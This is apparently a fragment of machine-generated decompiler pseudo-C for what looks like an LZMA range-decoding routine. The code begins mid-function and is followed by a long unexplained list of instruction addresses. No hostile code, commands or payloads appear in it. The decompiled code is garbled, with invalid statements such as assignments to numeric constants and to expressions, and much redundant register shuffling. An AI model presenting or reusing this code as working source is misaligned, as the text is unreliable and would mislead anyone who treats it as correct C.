                                                                                    														L118:
                                                                                    														_t391 = __ebp - 0x2c;
                                                                                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                    														__eflags =  *_t391;
                                                                                    														goto L119;
                                                                                    													}
                                                                                    													L113:
                                                                                    													__eax =  *(__ebp - 0x50);
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													__esi = __edi + __eax;
                                                                                    													 *(__ebp - 0x54) = __esi;
                                                                                    													__ax =  *__esi;
                                                                                    													__ecx = __ax & 0x0000ffff;
                                                                                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    													if( *(__ebp - 0xc) >= __edx) {
                                                                                    														__ecx = 0;
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    														__ecx = 1;
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    														__ebx = 1;
                                                                                    														__ecx =  *(__ebp - 0x48);
                                                                                    														__ebx = 1 << __cl;
                                                                                    														__ecx = 1 << __cl;
                                                                                    														__ebx =  *(__ebp - 0x44);
                                                                                    														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    														__cx = __ax;
                                                                                    														__cx = __ax >> 5;
                                                                                    														__eax = __eax - __ecx;
                                                                                    														__edi = __edi + 1;
                                                                                    														__eflags = __edi;
                                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                                    														 *__esi = __ax;
                                                                                    														 *(__ebp - 0x50) = __edi;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x10) = __edx;
                                                                                    														0x800 = 0x800 - __ecx;
                                                                                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    														 *__esi = __dx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														L111:
                                                                                    														_t368 = __ebp - 0x48;
                                                                                    														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                    														__eflags =  *_t368;
                                                                                    														goto L112;
                                                                                    													} else {
                                                                                    														L117:
                                                                                    														goto L109;
                                                                                    													}
                                                                                    												}
                                                                                    												L103:
                                                                                    												__ecx =  *(__ebp - 0xc);
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    													__ecx =  *(__ebp - 0x10);
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    													__ebx = __ebx | 0x00000001;
                                                                                    													__eflags = __ebx;
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													L101:
                                                                                    													_t338 = __ebp - 0x48;
                                                                                    													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                    													__eflags =  *_t338;
                                                                                    													goto L102;
                                                                                    												} else {
                                                                                    													L106:
                                                                                    													goto L99;
                                                                                    												}
                                                                                    											}
                                                                                    											L96:
                                                                                    											__edx =  *(__ebp - 4);
                                                                                    											__eax = __eax - __ebx;
                                                                                    											 *(__ebp - 0x40) = __ecx;
                                                                                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    											goto L108;
                                                                                    										case 0x1a:
                                                                                    											L56:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												L162:
                                                                                    												 *(__ebp - 0x88) = 0x1a;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L57:
                                                                                    											__ecx =  *(__ebp - 0x68);
                                                                                    											__al =  *(__ebp - 0x5c);
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    											 *( *(__ebp - 0x68)) = __al;
                                                                                    											__ecx =  *(__ebp - 0x14);
                                                                                    											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    											__eax = __ecx + 1;
                                                                                    											__edx = 0;
                                                                                    											_t192 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t192;
                                                                                    											goto L80;
                                                                                    										case 0x1b:
                                                                                    											L76:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												L163:
                                                                                    												 *(__ebp - 0x88) = 0x1b;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L77:
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax -  *(__ebp - 0x74);
                                                                                    											if(__eax >=  *(__ebp - 0x74)) {
                                                                                    												__eax = __eax +  *(__ebp - 0x74);
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											__cl =  *(__eax + __edx);
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											 *(__ebp - 0x5c) = __cl;
                                                                                    											 *(__eax + __edx) = __cl;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = 0;
                                                                                    											_t275 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t275;
                                                                                    											__eax =  *(__ebp - 0x68);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											_t284 = __ebp - 0x64;
                                                                                    											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                    											__eflags =  *_t284;
                                                                                    											 *( *(__ebp - 0x68)) = __cl;
                                                                                    											L80:
                                                                                    											 *(__ebp - 0x14) = __edx;
                                                                                    											goto L81;
                                                                                    										case 0x1c:
                                                                                    											while(1) {
                                                                                    												L123:
                                                                                    												__eflags =  *(__ebp - 0x64);
                                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L124:
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__edx =  *(__ebp - 8);
                                                                                    												__cl =  *(__eax + __edx);
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                                    												 *(__eax + __edx) = __cl;
                                                                                    												__eax = __eax + 1;
                                                                                    												__edx = 0;
                                                                                    												_t414 = __eax %  *(__ebp - 0x74);
                                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                                    												__edx = _t414;
                                                                                    												__eax =  *(__ebp - 0x68);
                                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    												__eflags =  *(__ebp - 0x30);
                                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                                    												 *(__ebp - 0x14) = _t414;
                                                                                    												if( *(__ebp - 0x30) > 0) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													L127:
                                                                                    													L81:
                                                                                    													 *(__ebp - 0x88) = 2;
                                                                                    													goto L1;
                                                                                    												}
                                                                                    											}
                                                                                    											L167:
                                                                                    											 *(__ebp - 0x88) = 0x1c;
                                                                                    											goto L170;
                                                                                    									}
                                                                                    								}
                                                                                    								L171:
                                                                                    								_t539 = _t538 | 0xffffffff;
                                                                                    								goto L172;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}















                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x0040719a
                                                                                    0x0040719e
                                                                                    0x004071a2
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004074cd
                                                                                    0x004074d6
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x00407524
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00407526
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x004075db
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x004074a9
                                                                                    0x004074af
                                                                                    0x004074b6
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x00000000
                                                                                    0x004074c1
                                                                                    0x0040752b
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bf9
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c03
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c5e
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406ca8
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd2
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d18
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x00407426
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x0040749d
                                                                                    0x00407458
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x0040749d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725b
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
